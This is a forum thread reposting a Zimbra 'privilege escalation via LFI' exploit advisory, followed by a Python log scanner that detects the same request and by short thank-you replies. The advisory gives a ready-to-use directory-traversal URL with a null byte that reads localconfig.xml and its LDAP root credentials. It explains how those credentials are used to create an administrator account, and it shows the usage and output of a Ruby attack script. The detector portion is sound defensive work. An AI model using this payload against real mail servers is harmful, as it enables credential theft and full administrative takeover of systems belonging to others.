C4r1st posted on 2014-1-26 11:24:56

Zimbra – 0day exploit / Privilege escalation via LFI


# Exploit Title: Zimbra 0day exploit / Privilege escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are affected
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical

# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip

---------------Description-----------------

This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials which allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privileges
and gain access to the Administration Console.

LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

Example :

http://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

or

http://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

----------------Exploit-----------------

Before using this exploit, the target server must have admin console port
"7071" open, otherwise it won't work.

Use the exploit like this:

ruby run.rb -t mail.example.com -u someuser -p Test123_23

[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
[*] Login URL : http://mail.example.com:7071/zimbraAdmin/
[*] Account : someuser@example.com
[*] Password : Test123_23
[+] Successfully Exploited !

The number of vulnerable servers is huge, like 80/100.

This is only for educational purposes.
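
A defender-side check for the request pattern described in the post above, as an added example that is not part of the original post or of the exploit archive: it scans web access logs for /res/...js.zgz requests whose skin parameter carries directory traversal, a null byte, or a reference to localconfig.xml. The combined log format, the sample entries and all function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request target and status code of a combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def skin_lfi_reasons(target):
    """Return the reasons a request target matches the skin LFI pattern."""
    parts = urlsplit(target)
    path = decode_fully(parts.path)
    if "/res/" not in path or not path.endswith(".js.zgz"):
        return []
    reasons = []
    skins = [decode_fully(v) for k, v in parse_qsl(parts.query) if k == "skin"]
    for value in skins:
        if ".." in re.split(r"[\\/]", value):
            reasons.append("path-traversal")
        if "\x00" in value:
            reasons.append("null-byte")
        if "localconfig.xml" in value.lower():
            reasons.append("localconfig.xml")
    return reasons

def scan(lines):
    """Return (line number, HTTP status, reasons) for each suspicious entry."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        reasons = skin_lfi_reasons(match.group("target")) if match else []
        if reasons:
            hits.append((number, int(match.group("status")), reasons))
    return hits

RES = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz"
SAMPLE_LOG = [  # constructed entries with documentation-range addresses
    f'192.0.2.10 - - [26/Jan/2014:11:30:01 +0000] "GET {RES}?v=091214175450&skin=harmony HTTP/1.1" 200 51234',
    f'198.51.100.7 - - [26/Jan/2014:11:31:09 +0000] "GET {RES}?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 8192',
    f'198.51.100.7 - - [26/Jan/2014:11:31:12 +0000] "GET /zimbraAdmin{RES}?v=1&skin=%252e%252e%252f%252e%252e%252fopt/zimbra/conf/localconfig.xml%2500 HTTP/1.1" 404 312',
    '192.0.2.11 - - [26/Jan/2014:11:32:40 +0000] "GET /index.html?skin=../x HTTP/1.1" 200 1020',
]
```

A hit with status 200 means the server may have returned localconfig.xml, so the LDAP credentials stored in it should be treated as exposed.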

gty48 posted on 2014-1-26 11:35:27

First reply.

blck posted on 2014-1-26 11:54:11

Nice, taking a look...

blck posted on 2014-1-26 11:55:34

LFI, the password is leaked directly

fenglail posted on 2014-1-26 12:04:29

Taking a look, will study it

Diana posted on 2014-1-26 14:11:21

I knew it would be like this~

whc posted on 2014-1-26 17:26:50

Taking a quick look

keerol posted on 2014-1-26 20:54:32

Nice, taking a look

LostSoul posted on 2014-1-27 07:36:59

Andre posted on 2014-1-27 11:27:11

Learned something, thanks to the OP for sharing